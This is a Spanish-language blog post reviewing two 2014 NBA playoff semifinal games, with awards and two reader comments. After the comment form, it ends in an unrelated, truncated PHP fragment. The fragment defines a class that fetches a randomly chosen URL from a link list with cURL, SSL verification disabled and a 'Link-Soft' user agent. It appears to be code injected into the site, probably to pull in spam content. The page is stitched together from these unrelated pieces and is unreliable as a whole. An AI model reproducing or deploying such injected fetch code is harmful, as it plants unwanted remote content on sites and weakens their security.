La Crónica: Dolorosa impotencia

09 de May de 2014 por TheDeerHunter

Las dos semifinales que se disputaron ayer apuntan peligrosamente a resolverse por la vía rápida y eso que no se aprecia un gran despliegue de fuerzas por parte de los favoritos.

Los campeones comenzaban algo dormidos y se encontraron además con un Mirza Teletovic en estado de gracia que anotó sus 4 primeros triples sin fallo para terminar batiendo el récord de la franquicia en playoffs con 6. Sin embargo, los Nets veían que ni aún así cobraban ventaja en parte por culpa de un Deron Williams catatónico, en la peor actuación de su carrera. Los Heat se limitaban a dejar que todo cayera por su propio peso, con una versión humana de LeBron más un buen Chris Bosh. Terminaba definiendo Ray Allen con sus 13 puntos en la segunda parte, gustándose ante sus excompañeros. Los Nets llegaron a pasarse los 3:39 minutos finales del partido sin rascar bola, cediendo todos los rebotes al peor equipo de la liga en ese aspecto (82-94). LeBron nunca ha perdido comenzando 2 a 0 a su favor.

En San Antonio los Spurs necesitaron una buena bronca de Popovich para espabilar y no complicarse la vida. Excesiva superioridad que certificaron en cuanto les dio la gana. El choque quedó prácticamente resuelto con la defensa de Tiago Splitter a LaMarcus Aldridge que se quedó en un  2 de 14 ante el marcaje del brasileño. Batum, Lillard y Matthews no pueden revertir en la vida tal circunstancia sumado por no hablar del esperado desequilibrio de los banquillos. La defensa de Portland, además, dejó mucho que desear permitiendo a los subcampeones firmar un cómodo 52% de tiro (97-114). Pinta mal. 

PREMIOS

MVP: Buenas actuaciones de Kawhi Leonard o LeBron James pero el mayor desequilibrio anoche llegó desde las segundas unidades. Ray Allen anotó sus 13 puntos en el impás de resolución del partido acumulando además 8 rebotes, 2 asistencias, 1 robo y 1 tapón en 28 minutos. Por San Antonio, la batería Diaw-Belinelli-Ginobilli-Mills es un factor insuperable para los Blazers.

Sorpresa: Buenos minutos de Will Barton, que no falló ninguno de sus 5 lanzamientos para firmar 13 puntos y 1 rebote en 12 minutos. Los Blazers necesitan muchos más reservas de este tipo.

Decepción: Incomprensible actuación de Deron Williams, sin precedentes similares. 0 puntos con 0 de 9 en lanzamiento. Se suponía que él debía de ser un factor desequilibrante sobre Mario Chalmers.

Esfuerzo en vano: Buen partido de Batum. 21 puntos con 9 de 13, 9 rebotes, 2 asistencias y 1 robo. Aún así muy lejos de lo que salvaría a su equipo.

Comenta

2 comentarios a esta entrada

  1. rumbero dice:
    #1

    Así como en la primera ronda parecía que Miami no acababa de arrancar en estos dos partidos me da más la sensación que les quedan un par de marchas por poner. Les vale con una versión terrenal del Big Three y una defensa un poco más agresiva. Más Allen que se va engrasando para lo bueno.
    Y eso que este segundo partido se ha jugado más al ritmo que le gusta a Brooklyn, pero como suele pasar contra Miami, apagón en el último cuarto cuando se está decidiendo el partido.

    Y San Anotnio con 7 tios en dobles dígitos de anotación, 50 puntos del banquillo, maniatando a Aldridge…. Modo Spurs On. Eso es casi imposible de parar cuando se ponen. Parece difícil que los Blazers puedan revertir esta dinámica en casa pero quién sabe. Harán falta versiones superlativas de Lillard y Aldridge

      Citar

  2. GreenPride dice:
    #2

    Pues estas dos eliminatorias nos están dejando un sabor de boca un poco vacío ya que los aspirantes no parecen en condiciones de parar a los favoritos. Los dos finalistas del año pasado están ganando con la sensación de que aún les queda una marcha más por si fuera necesario.
    En Miami los Nets no pueden con una versión muy normalita de los Heat, con LeBron sin pisar el acelarador y Wade jugando a ratos. Pero es que el small-ball es propiedad de los de Florida y a los Nets les faltan amenazas interiores para poder poner en problemas a los Heat. Si además su posición con teórica mayor ventaja sobre Miami que es el base se encuentra con un Deron Williams en la parra pues peor me lo pones. O reaccionan a tope ante su publico o esto acabará rápido.
    Y mientras en el Oeste los Blazers se nos vienen abajo ante unos Spurs que ahora sí parecen haber cogido la honda. Un gran Kawhi Leonard les martillea y cada vez que salen las segundas unidades se acaba el partido ya que el repaso de los Spurs en esos minutos es antológico. Si además controlas un a Lillard (primer partido) o a Aldridge (sengundo partido) pues el resultado es dos palizas que se llevan los de Portland para Oregon donde deberán cambiar las sensaciones enteramente si no quieren que las series acaben demasiado rápido. Los hados del basket deben un anillo a los Spurs por lo del año pasado (¿será este año???)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>